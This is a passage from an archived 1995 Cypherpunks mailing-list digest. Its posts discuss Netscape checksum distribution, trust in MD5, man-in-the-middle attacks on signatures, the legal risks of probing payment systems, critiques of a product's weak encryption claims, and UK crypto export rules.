but it turned out to be the page for these other folks.) They appear
to be located in Wisconsin, of all places.

Also, an outfit called "MIDS.com" (M&I Data Services) seem to be
involved in this. Another outfit from Wisconsin. Weird. (Time to
look at a map and see where Wisconsin is wrt MO. I think they're
both in the middle. :-) I may be guilty of a bit of crass regionalism,
but Wisconsin is not a place I associate strongly with either
outstanding graphical design or with Internet savvy. Mostly I think
of cheese...  and certainly these folks turn out some cheezy web pages.

Also, I think any organization that thinks "WorldWide Wizdom (tm)"
is an appropriate name for a financial advice column needs to have a
marketing department transplant. And they should really lose that
ghastly black background. It makes the page look like a velvet
painting.

(heavy sigh)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 09:22:23 PDT
To: lharrison@mhv.net
Subject: Re: Verification of Registration
Message-ID: <9510241618.AA07331@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   Curious.  Did anyone else receive this unsolicitated *invitation*?
> 
> At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
> >Your membership registration has been processed.  To become a full member
> >of c|net online, please return the text of this message (to verify@cnet.com).

Someone signed the mailing list up.  I'm sure that they'll tell us about it
when they get done.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 24 Oct 95 09:28:18 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <308D04F8.7E0F@netscape.com>
Message-ID: <199510241622.JAA01499@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   I posted a list of MD5 checksums as a personal favor to various cypherpunks
> who asked for them, since I have access to the original bits.  The official
> Netscape solution for checking your downloaded distribution will be
> announced later in the year.  In the mean time anyone who is uncomfortable
> with downloading the bits from the net can always buy a copy.  We will
> ship them the distribution on floppy.
> 

	That's quite lame.. (not on your part jeff, obviously, because
you posted the md5s) Netscape's responses in the past has been pretty
quick, but this is damn slow. I am disappointed. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 24 Oct 95 09:44:30 PDT
To: gorkab@sanchez.com (Brian Gorka)
Subject: Re: C|Net
In-Reply-To: <00998577B2607A40.00004156@sanchez.com>
Message-ID: <199510241637.JAA02576@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Eesh folks. Someone resgistered cypherpunks/cypherpunks as a
username/password combination as c|net and that was the
verification. relax.

> 
> Yes, I got it too.  What is it?
> 
> >  Curious.  Did anyone else receive this unsolicitated *invitation*?
> >
> >At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
> >Your membership registration has been processed.  To become a full member
> >of c|net online, please return the text of this message (to verify@cnet.com).
> >
> ----------------crap deleted---------------
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@toad.com (Cypherpunks)
Date: Tue, 24 Oct 1995 09:03:00 -0700
To: verify@cnet.com
Subject: Re: Verification of Registration
Message-ID: <v02130502acb2bdaed21e@[204.131.233.49]>
MIME-Version: 1.0
Content-Type: text/plain


>Your membership registration has been processed.  To become a full member
>of c|net online, please return the text of this message (to verify@cnet.com).
>
>The following magic token in this message [cypherpunks::752400770] will be automatically
>processed to verify you.  Please note: The number included in the token is
>*not* your password; the one to use on the site is the one you entered on
>the registration form.
>
>Please include the complete token appearing above, including the brackets.
>The best way to return it to us is to include this entire message in your
>reply.  If you mailer does not allow you to do this, retype or cut and
>paste the magic token (including the square brackets) into a new message to
>verify@cnet.com. If you are having difficulty completing this process,
>please direct your questions to support@cnet.com.
>
>Once you are verified you will be able to take advantage of the full
>range of c|net online's services.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 10:14:29 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <199510240659.QAA07645@sweeney.cs.monash.edu.au>
Message-ID: <199510241713.KAA06569@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum <jirib@sweeney.cs.monash.edu.au> writes:

>hfinney wrote (but didn't sign):
>> Well, this is not necessarily the case.  A MITM may be signing my
>> messages for me, and then putting them back the way they were before I
>> am allowed to see them.  Granted, this would not be easy, and perhaps
>...
>> futile.  Doesn't this bother you?

>The point is that what if there's a MIMT who is changing the signatures
>on the hfinney posts? What if originally they were signed "Alice" but
>then a MIMT went and substituted "Hal"?

>Then any reputation I attached to Hal should really go to Alice, no?
>And even when I get a certified key for Hal, I still can't really put
>the reputation onto it, since maybe the reputation really belongs to
>Alice.

>Doesn't this bother you?

Yes, this is a problem with the use of certificates to try to detect
the MITM.  As I wrote before, there is still a way in which certs can
be useful.  Your attack shows that you can't use true name certificates
to confirm that there is no MITM in front of Alice.  However, you can
use them to detect a MITM who is interposing himself between you and
the rest of the net.  In other words, if I am Alice, I can use
certificates to make sure that no MITM is behaving as above, altering
my messages and signing them "Hal".

What I do is to acquire a valid signature key via offline means, and use
that to validate the keys of people I want to communicate with.  I am
then able to send them messages securely, and ask them to confirm that my
keys and user name do match those which appear in messages I have posted.
The MITM is not able to know the contents of these messages which I send,
hence he can't stop me from finding out his existence.

>At least with digital signatures I can be certain that the same person
>always signed the messages (and that ri cannot repuditate them), even
>if I don't necessarily know who that person is. (I guess the issue
>becomes plagiarism rather than impersonation.)

IMO by itself knowing that the same person signed every one of a set of
messages is not that useful, since anyone can sign any message.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 24 Oct 95 07:17:43 PDT
To: cypherpunks@toad.com
Subject: Hacking commercial systems.
Message-ID: <9510241417.AA26593@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	A number of people have been proposing hacks on commercial payment 
systems. Could I point out that this is not necessarily a good idea? One vendor 
I spoke to has a contract clause with sublicensees which requires a legal 
response in such situations. His opinion was that attempting such a crack on a 
"live" system consitituted conspiracy to commit fraud and organisation of the 
same could involve RICO penalties.

	It would seem prudent to approach such projects with a little caution. 
If a request were made for a sample of material to work on most companies would 
oblige and a refusal would provide protection against legal tactics. Most 
sensible companies would see the advantage of offering a reward.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 24 Oct 95 07:33:21 PDT
To: cypherpunks@toad.com
Subject: Mondex flaws? Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <v02120d07acb1f3d69b57@[199.2.22.120]>
Message-ID: <9510241433.AA21881@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	You mention architectural problems in Mondex. Do you have any hard info 
on the specs? I'm trying to find someone who does who is willing/able to talk.

	One thing that struck me was that each Mondi would need to have both the 
secret and public parts of a public key incorporated (if thats what they are 
doing) hence what is the advantage of public key? Yet they have an on chip 
modular exponentiation device on the new silicon rev...

	Looking at the secrecy stuff on Mondex, I suspect I would take the same 
approach, not to protect the core protection but so as to permit a gradual 
approach to penetration detection. I would expect some type of tripwire to be 
built into the device such that a fraud attempt apparently succeeds but 
indicates that there is a problem. 

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 24 Oct 95 10:35:46 PDT
To: cypherpunks@toad.com
Subject: What is needed for S/MIME remailer ?
Message-ID: <9509248145.AA814556043@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        The other day I was wondering what it would take to make an
anonymous remailer for an S/MIME client.  Implementing S/MIME from
scratch is a lot of work given the lack of a public domain
implementation, but it seems that a remailer could be built on top
of a commercial email product that supported S/MIME.  The question
is: What features should a commercial S/MIME email product have to
make it easy to support a remailer?  Are there a small set of
command line options that would greatly simplify a remailer
implementation?
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 07:46:20 PDT
To: dl@hplyot.obspm.fr (Laurent Demailly)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241425.AA08815@hplyot.obspm.fr>
Message-ID: <9510241442.AA12411@all.net>
MIME-Version: 1.0
Content-Type: text


>  > [...] uses an MD5 checksum which the members
>  > of this list seem to place unlimited trust in (incorrectly in my view,
>  > but that would be picking two nits with one keyboard entry).
> 
> Can you elaborate with facts on the supposed weakness of MD5 ?

I didn't say that there were any weaknesses in MD5, all I said was:
	"unlimited trust ... (incorrectly in my view...)"

The lack of adequate demonstration of strength is not the same as a
weakness.  It represents only a lack of adequate assurance for placing
more than a certain amount of trust in MD5 for the purpose it is being
used to accomplish.

As to weaknesses, I seem to remember that someone managed to forge a
modification to a program used to observe networks on a Sun so that it
had the same MD5 checksum as the official trusted version.  But whether
this is real is not strictly the issue. 

In the case of the trust being placed in MD5 by Netscape, the assumption
being made (without adequate support as far as I can tell) is that an
MD5 checksum cannot be forced, through a chosen plaintext attack, to
yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
allow the known plaintext attack that gets the RSA private key used to
authenticate messages.  As far as I am aware (and I may not be aware of
everything) there is no reference work to support this assumption.  If
the assumption is wrong, then the whole SSL can fall to a selected
plaintext attack launchable (presumably) through those general purpose
Java aplets we have heard so much about.

> [btw who talked about 'unlimited' trust ?]

There has been no limit given by anyone on this list to the level of
trust they place in MD5.  Several people have posted (without
contention) that MD5 is sufficiently trustworthy to trust billions of
dollars in commerce to it's being able to prevent a selected plaintext
attack as eluded to above.  If you think we should trust it, and you
don't limit your assessment of trust, what other assumption should I
make? If several people proclaim that trust and nobody stands up in
disagreement, tacit agreement is my normal (although not necessarily
justified) assumption. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 24 Oct 95 10:53:16 PDT
To: cypherpunks@toad.com
Subject: 80 bit security from 40 bit exportable products
Message-ID: <9509248145.AA814557096@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Long ago vendors should have put encryption into network layer
products, but for a variety of reasons that effort was delayed or
discouraged.  One effect of this lack is that almost every layer of
the network stack is adding its own encryption.  For example, the
HTTP session layer added S-HTTP and the TCP transport layer added
SSL.  Soon we will have network layer encryption with IPsec.
        The vendors for each layer can export a product that uses
ciphers with 40 bit keys.  A user can then combine multiple
products to get more than 40 bits worth of security.  For example,
a web client might fetch an S-HTTP page over an SSL protected link
via a firewall that supports IPsec tunnels.  That's three 40 bit
keys protecting the data over the internet link (of course, this
may not be equivalent to a 120 bit cipher, that depends on the
details of the cipher systems and independence of the key setups).
Interesting possibilities.
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 23 Oct 95 17:58:29 PDT
To: bigmac@digicash.com (Marcel van der Peijl)
Subject: Re: Re: Chaum's cash: backup?
In-Reply-To: <199510230611.HAA25001@digicash.com>
Message-ID: <199510240052.KAA06728@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Marcel van der Peijl <bigmac@digicash.com>
  and jamesd@echeque.com, cypherpunks@toad.com

MvdP wrote:
> "James A. Donald" <jamesd@echeque.com> wrote:
> >>if it was like "real" cash, then it really would be lost.
> >It is really lost.
...
> I could give a hint: your random state initializer is not the too-often 
> used srand( time( NULL ) ) but user-chosen during installation.

This sounds great... Will the bank be running crack against the proto-coins
it gets? (Say, at the behest of a LEA?)

Is there any way for the user to re-initialize the random state?

> Write that initializer down and you can re-generate all coins.
...

That's going to be one hell of a valuable piece of paper.
(Certainly to your enemies/prosecutors - it reveals the blinding factors
for every coin you ever spent.)


Please tell me I've got it all wrong...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIw44ixV6mvvBgf5AQEbEQP/dxnyqUNdtz46s19snQSr4lPTd7dtN7Bx
SJRl9IovlBx3qqMIkf/n/kp9pGPrfv9iUPzKVVQRjX9q1jsRYDxBwEwPAIZTXX1d
epwrYkGhO0R3PEz71u9O8FMz2vHHnGT8cjP7zSAnqIikqXfKdwRzy1wBtK5qUUPj
upYwGZUXK7M=
=tuu2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond Val" <x85849i1@cadet1.USMA.EDU>
Date: Tue, 24 Oct 95 07:56:26 PDT
To: cypherpunks@toad.com
Subject: Re: Verification of Registration
Message-ID: <9510241456.AA25959@trotter.usma.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lynne L. Harrison writes:

>  Curious.  Did anyone else receive this unsolicitated *invitation*?

Everybody who receives mail from cypherpunks@toad.com received this
message becuase the message was addressed to 
cypherpunks@toad.com.  Apparently someone may have 
joined this 'group' or service and used the cypherpunks address as 
the e-mail address.  Mayhap the cypherpunks@toad.com / cypherpunks
userid/password. 

This would be my guess, of course.

Does anybody know what this service does?

Raymond Val
x85849i1@cadet1.usma.edu

*********************************************************
My opinions are my own and are not the goverments
or my schools.
*********************************************************

****************************************
Raymond Val
x85849i1@cadet1.usma.edu
****************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 24 Oct 95 08:08:38 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Verification of Registration
In-Reply-To: <9510241224.AA19261@mhv.net>
Message-ID: <199510241508.LAA25299@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


verify@cnet.com writes:
> Your membership registration has been processed. [...]
> The number included in the token is *not* your password;
> the one to use on the site is the one you entered on
> the registration form.

Lynne L. Harrison, Esq. writes:
>   Curious.  Did anyone else receive this unsolicitated *invitation*?

...and several other people said "me too !!" to the 1000+ people on the list.

<sigh>

We really do have a lot of new people here these days, don't we ?  :}

OK, first of all, yes, we all got it, it was sent to the list address.

Second of all, sending messages that amount to "me too !", with lots of
gratuitous quoted text, to a large mailing list is generally a _very_
poor idea. This advice generally occurs in the first few pages of any general
guide to Usenet, netiquette, etc.  I wonder why they publish those things ?
No-one seems to read them....

Thirdly, what has happened is that someone has registered for a service at a
web site and given the c'punks list address as the membership address. 
Reply email is a standard mechanism for verifying an address.

Now, a while back some c'punks made a habit of signing up for various 
(usually free) services on the net, and publicizing the username/password
pairs, to stymie the collection of membership profiles etc. Often a
fairly standard combination like username=cypherpunk,password=cypherpunk was
used so people could easily guess the right pair for any given site.

Unfortunately, many people gave the list address as the member contact
address when they registered somewhere. Getting spammed with a potentially
huge number of registration confirmations isn't very helpful to the list.
Various people have asked everyone to cease signing the list up to these
sites. But the paradigm seems to have caught on a bit too well, and we still
get confirmation messages periodically.

Finally, have a nice day. 

Enough history -- now back to social studies with Alice.... 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Oct 95 10:54:36 PDT
To: cypherpunks@toad.com
Subject: Attacks on Products and Companies
Message-ID: <acb27260000210046c88@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 AM 10/24/95, Ian Goldberg wrote:

>We should be keeping in mind that the goal here is to end up, in one way
>or another, with a _secure_ way of transacting on the net.  To that end,
>it may be necessary to demonstrate that some current products don't
>provide that way.  We certainly don't want people to be scared away
>from using one insecure product, only to use another, especially
>if the latter is less secure than the former.
...
>Everything would be _so_ much easier to check, though, if these
>people would stop this "security through obscurity" garbage and
>publish their protocols, if not their source.
>
>   - Ian "Mr. Worf, activate targetting scanners."


I don't wish to beat a dead horse, but my main point is not that we (the
list members, and others) should not be scrutinizing and trying to break
systems, but that it should be done with less general nastiness.

What do I mean by "nastiness"? (And let me first hasten to add that neither
Ian Goldberg nor his partner were nasty in their attacks on Netscape.)

The problem I see is that people often _personalize_ the attacks, or treat
members of companies who show up on the list as _adversaries_. I can't know
for sure if the various folks from Netscape, First Virtual, Digicash,
Intuit, etc., who hang out on this list feel besieged, but I know I sure
would. If everything I said, even with disclaimers that I don't speak
officially, were to be torn apart and the ulterior motives speculated upon,
I'd either shut up on this list or get off it completely. (Recall that we
had Marc Andreessen on this list last December--for whatever reasons, and
there are likely several, he left. I recall many attacks on his company. He
perhaps figured "What the hell do I need this for?")

Legitimate, scientific analysis is commendable. The brute force attack on
Netscape was great, and even better was the random seed attack. But many of
the attacks are less solid:

"How can you people at Digital Datawhack produce such crap? The assumptions
you make in the Flogisticon module are disgusting, another example of
security through obscenity."

(What I think this piling on is likely to accomplish is to push company
list subscribers here to just shut up. They see that the more is said by
folks from Netscape, as the best current example, the more fireworks and
insults ensue. The less that is said the better. This is not a good
situation.)

I'm not arguing for "niceness," just that some of the edge be taken off the
attacks.

The "bounties" that are being offered in press releases have the danger of
inviting premature announcement of results. And of discouraging companies
from actively participating in this list and discussing what might be done
to improve security.

Just my views. No doubt some will think I'm a shill for some company.

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 23 Oct 95 18:39:28 PDT
To: cypherpunks@toad.com
Subject: Re: [reformatted] how secure can privasoft be?
In-Reply-To: <199510210401.AAA16706@opine.cs.umass.edu>
Message-ID: <199510240132.LAA06800@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello privsoft@ix.netcom.com
  and cypherpunks@toad.com (Cypherpunks Mailing List)
  and futplex@pseudonym.com (Futplex)
 
F. writes:

...
> > The cryptographic engine of PrivaSoft
> > 
> > PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit number 
> > uniformly normalized from the user's secret key.  The engine is proprietary, 
> > designed according to the rules of modern cryptology to make the best use of 
> > the allowable key length.
> 
> This seems paradoxical. PrivaSoft uses a key approximately 30 bits long. It
...
> Two possible explanations I can imagine are:
> 
> (0) PrivaSoft actually uses a key longer than 9 digits, and someone just made
...

Could it be 9 hex digits = 36 bits?

Perhaps there's an even bigger paradox in there:
  "
   The engine is proprietary, designed according to the rules of modern
   cryptology.
  "

Now I'm not familiar with the rules cited, but wouldn't proprietary
tend to go against them?

> [...]
> > The use of default keys

...
> meant to resist attacks based on the cryptanalyst gaining access to many 
> ciphertexts, even if all were encrypted with a single key.

Perhaps theirs isn't? Could be a Freudian slip, you know...

> [...]
> > A simple example:  For a short message, increasing the font 
> > size of the text by a factor of 10 will significantly increase the time 
> > required for breaking the encryption.
> 
> Anyone know how to get 120 point text in LaTeX ?

Don't worry, the whole thing sounds bogus anyway. I'd say a larger
font would make it *easier* to break (more correlation per pixel).
They probably think it'll be harder because there's more pixels.

In the original message (NOTE CHANGE IN INDENT!):

> From: anonymous@freezone.remailer

...

> Introduction
> 
> PrivaSoft is a communication security product, and the user is entitled to
> know how secure it is.  This document addresses the question of cryptographic 
> strength of PrivaSoft.

No it doesn't.

> Export license regulations
> 
> In some advanced countries, cryptographic products are categorized as 
> "munitions" and their use, sale or exportation is controlled by local 
> licensing regulations.  PrivaSoft has obtained an export license from the 
> governments of Israel and the USA.  Licenses in other countries are obtained 
...

All right, I guess it does. USA approved export, so it must be very weak.

...
> The basic intention of this regulation is to protect the state from abuse of 
> too strong cryptographic products by terrorists and criminals.
...

Is it? I think there are one or two people on this list who think the
intention is otherwise...

...
> The use of default keys
...
> This is done by using the pseudo-
> random "key extension" feature which is described in the PrivaSoft user's 
> guide.

Do they mean "salt"? If so why don't they say it?
If not, what *do* they mean?

> The information contents a clear message

This is a strange title (I suspect "of" dropped out), but it might
well sum it all up :-)

> If a cryptographic product is properly designed, then the almost only way to 

A big "if", if I might say so.

...
> a significant 
> portion of the page must be reconstructed, and a significant amount of 
> mathematical correlation must be calculated between neighboring areas of the 
> image, before the cracking software can tell whether the candidate key is 
...

This can at most buy you a constant factor - useful, but not very.
I doubt the two uses of "significant", too. Anybody remember those
diagrams in Typing textbooks about the layout of a letter?

...
> Customized versions of PrivaSoft
> 
...
> The cryptographic engine can be customer-furnished and customer integrated, 
...

What do they mean by this bit?


Sorry about being so negative, but it is necessary when evaluating security.

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIxCPyxV6mvvBgf5AQFTEQP+IJL0X3iehm2B6zJf+eI0EThmxmJpCkbt
KhiAw/dTP/Bdy2Io5pFY1YiIUxkfZyS94N6zd6WqCj48UvfNUlp2t3bN8g1kip+T
feJJmwwhnzdyuf8m8zgFNcW9lH9143/tqw9l0JDrjpyNp8l39zv+MbH5juAenC40
U7JUExUdcSE=
=Fzqp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 24 Oct 95 08:39:49 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Hacking commercial systems.
In-Reply-To: <9510241417.AA26593@zorch.w3.org>
Message-ID: <199510241539.LAA26204@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phill writes:
> [One vendor's] opinion was that attempting such a crack on a "live" system 
> consitituted conspiracy to commit fraud
[...]
> If a request were made for a sample of material to work on most companies 
> would oblige and a refusal would provide protection against legal tactics. 

Assuming for the sake of argument that the vendor's opinion turns out to be
legally valid (IANAL):

There's something here I don't understand. How would a refusal to provide
a sample for testing/hacking provide protection against possible fraud 
charges for hacking The Real Thing (tm) ?

Maybe that's how the law works (in some jurisdictions), but I don't see a
logical connection. I'm not aware of companies involved in deployed payment
systems throwing samples to the dogs.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 08:52:20 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Does your software?
In-Reply-To: <Pine.SUN.3.90.951024083716.7258A-100000@dfw.net>
Message-ID: <9510241549.AA19649@all.net>
MIME-Version: 1.0
Content-Type: text


Aleph One / aleph1@dfw.net typed:
...
> fc@all.net typed:
> > That's correct.  Secure software has to have secure distribution in
> > order to maintain its security when distributed through an untrusted
> > channel.  I think that Netscape uses an MD5 checksum which the members
> > of this list seem to place unlimited trust in (incorrectly in my view,
> > but that would be picking two nits with one keyboard entry).
> 
> Question: Does your software (your striped down http server, etc)
> do this? I bet not.

How much do you owe me?

The differences between my secure http server and Netscape's browser
are quite dramatic, so I think you deserve a fairly comprehensive answer.

My get-only server cannot run outside applications, and hence does not
have the vulnerability of Netscape's browser.  Note also the distinction
between a server and a browser.

My get-only server is available in source form, is 80 lines long and
thus easily understood, has been shown to meet security properties, is
now in the process of being mathematically proven to meet those
properties, and is published in a refereed journal which can be used to
confirm its contents in detail.  Hence, I do provide secure distribution
through purely physical means. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 24 Oct 95 08:54:39 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241425.AA08815@hplyot.obspm.fr>
Message-ID: <199510241554.LAA27916@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
# MD5 [...] which the members of this list seem to place unlimited trust in 
# (incorrectly in my view, 

Laurent Demailly writes:
> Can you elaborate with facts on the supposed weakness of MD5 ?

Remember the can-you-trust-PGP flamewar we had a few months ago ?

I believe Dr. Cohen's point is that no-one knows, AFAIK, how to prove that a
one-way hash is truly one-way (uninvertible). We cannot prove that MD5 is
secure, ergo we cannot (completely) trust it. [Please correct if this is a
substantially incorrect inference.]

One of the standard responses is "it's the best we can do". When people said
this about PGP, FBC made some (IMHO) interesting comments about the
encryption he uses in various circumstances. Perhaps he would like to share
his personal choices of one-way hash functions with us.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 24 Oct 95 08:58:21 PDT
To: cypherpunks@toad.com
Subject: Fred, Fred, Fred: Enough already!
Message-ID: <v02120d07acb2bab4104b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Can we please talk to Dr. Fred, the Poster Child of the Informal Fallacy,
if we *really* have to, off line?

I had my fill of specious arguments in college already. Speaking of both, I
would reccommed any book on elementary logic (Copi used to be a good one),
specifically the informal falacies section, if you want a good laugh, and
to see why his "Did so, did not! Prove it didn't!" argument style makes me
want to step outside and hork in the bushes.

I would hate to kill-file people who are normally clueful, but I will, just
to get this second-order Fredness out of my face.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Tue, 24 Oct 95 04:04:50 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: crypto export from the UK
Message-ID: <208.9510241158@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Adam <aba@atlas.ex.ac.uk> writes:
> Jon Baber <jbaber@mi.leeds.ac.uk> writes: 
> > I believe that the laws regarding the export of crypto from the UK are
> > very similar to the ITAR regs in the US.
> 
> I thought they were markedly different!
> 
> I always understood there were NO restrictions on crypto export,
> import or use to western countries.  There used to be COCOM agreements
> which said that you should get approval to send commercially produced
> crypto to some blacklisted countries (Iraq, etc).  I also read that
> the COCOM restrictions did not claim to apply to free software.

I think that it was the COCOM restrictions that I was thinking about. The
blacklist was fairly large (including the USSR) and I believe that it did apply
to software (although I do not know about free software).

> Anyway, I read that the COCOM agreement has expired, so none of this
> applies anymore, even.

Now this I did not know. Do you know when it expired and why it was not renued?
We must still have some export restrictions for Munitions does this no-longer 
cover crypo?

> > However our Government seems to take the view that putting crypto
> > software on the net is not exporting it, the exporting is done
> > whenever anyone from an export restricted country downloads the
> > software and is done by them rather than by the person who made the
> > software available.

> I also have heard this.

I can not remember where I heard this though. I don't suppose you know whether
this was an official policy statement or just a comment like 'well it may technically be illegal but we would hold the downloader liable rather than the
supplier'?

> I think he would be safe emailing it, putting it on the WWW, or
> posting it to USENET.  There are no selective access restrictions on
> *any* crypto ftp/http sites that I know of in the UK (like various
> ones in the US which make a sho of enforcing the export restriction by
> not allowing export to non-US domain names.)
> 
> Adam

I do not know of any crypto sites in this country with access restrictions but
I would still probably make any software available via the WWW or an FTP site
(or maybe post it to USENET via a host in this country) rather than actively
mail it abroad... but then again I am paranoid (at least it does not involve
shipping larges pipes out of the country).

Jon
jbaber@mi.leeds.ac.uk
http://www.chem.surrey:80/~ch02jb/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 24 Oct 95 05:11:24 PDT
To: jbaber@mi.leeds.ac.uk
Subject: Re: crypto export from the UK
In-Reply-To: <208.9510241158@misun2.mi.leeds.ac.uk>
Message-ID: <28071.9510241209@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



[Paul: cc'd you about legal question about who it is that "exports"
the person downloading or the person with the server, you made a
comment on this a short while ago in one of the crypto groups (below)]

Jon Baber <jbaber@mi.leeds.ac.uk> writes in cypherpunks:
> Adam <aba@atlas.ex.ac.uk> writes:
> > I thought they were markedly different!
> > 
